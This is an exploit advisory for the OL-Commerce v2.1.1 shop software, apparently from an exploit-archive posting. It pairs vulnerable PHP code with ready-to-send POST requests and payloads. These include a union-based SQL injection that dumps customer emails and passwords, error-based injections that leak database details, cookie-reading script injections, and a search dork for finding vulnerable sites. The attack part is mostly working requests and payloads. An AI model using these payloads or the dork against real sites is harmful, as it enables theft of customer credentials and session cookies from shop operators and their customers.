OL-Commerce v2.1.1 - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         :
http://sourceforge.net/projects/ol-commerce/?source=directory
.:. Dork           : inurl:"affiliate_signup.php"  intext:"Mr:"
####################################################################

[1] Multiple Sql Injection
===========================
VULNERABILITY
##############
[I] /affiliate_signup.php

Line 53:
                       $a_company =
olc_db_prepare_input($_POST['a_company']);

Line 169-175:
            $check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) .
"'");
            $check_value = olc_db_fetch_array($check_query);
            $entry_state_has_zones = ($check_value['total'] > 0);
            if ($entry_state_has_zones) {
                $zone_query = olc_db_query("select zone_id from " .
TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) . "'
and zone_name = '" . olc_db_input($a_state) . "'");
                if (olc_db_num_rows($zone_query) == 1) {
                    $zone_values = olc_db_fetch_array($zone_query);

#########
EXPLOIT
#########
Type: Post String Mysql Injection

http://localhost/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL
INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select
group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers--
-

VULNERABILITY
##############
[II] /affiliate_show_banner.php (line 107-120)

if (isset($_GET['ref'])) $affiliate_id = $_GET['ref'];
if (isset($_POST['ref'])) $affiliate_id = $_POST['ref'];

if (isset($_GET['affiliate_banner_id'])) $banner_id =
$_GET['affiliate_banner_id'];
if (isset($_POST['affiliate_banner_id'])) $banner_id =
$_POST['affiliate_banner_id'];
if (isset($_GET['affiliate_pbanner_id'])) $prod_banner_id =
$_GET['affiliate_pbanner_id'];
if (isset($_POST['affiliate_pbanner_id'])) $prod_banner_id =
$_POST['affiliate_pbanner_id'];



if (!empty($banner_id)) {
    $is_banner = 'true';
    $sql = "select affiliate_banners_image, affiliate_products_id from " .
TABLE_AFFILIATE_BANNERS . " where affiliate_banners_id = " . $banner_id  .
" and affiliate_status = 1";
    $banner_values = olc_db_query($sql);

#########
EXPLOIT
#########
Type: Double Query


http://localhost/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL
INJECTION]

VULNERABILITY
##############
[III] /create_account.php

Line 75:

 $country = olc_db_prepare_input($_POST['country']);

Line 218-219:

      $check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" . (int)$country . "'");
      $check = olc_db_fetch_array($check_query);


#########
EXPLOIT
#########
Type: Post String Double Query


http://localhost/OL-Commerce/create_account.php

POST /OL-Commerce/create_account.php  HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301


action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&email_address=email@hotmail.com
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL
INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4

[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -

VULNERABILITY
##############
[V] /admin/create_account.php

Line 57:

  $entry_country_id = olc_db_prepare_input($_POST['entry_country_id']);

Line 208-209:

        $check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" .
olc_db_input($entry_country_id) . "'");
        $check_value = olc_db_fetch_array($check_query);


#########
EXPLOIT
#########
Type: Post String Double Query

http://localhost/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit  HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -


[2] Multiple Post Cross Site Scripting
=======================================

[I]http://localhost/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[XSS]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>


[II]http://localhost/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit  HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[XSS]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>

####################################################################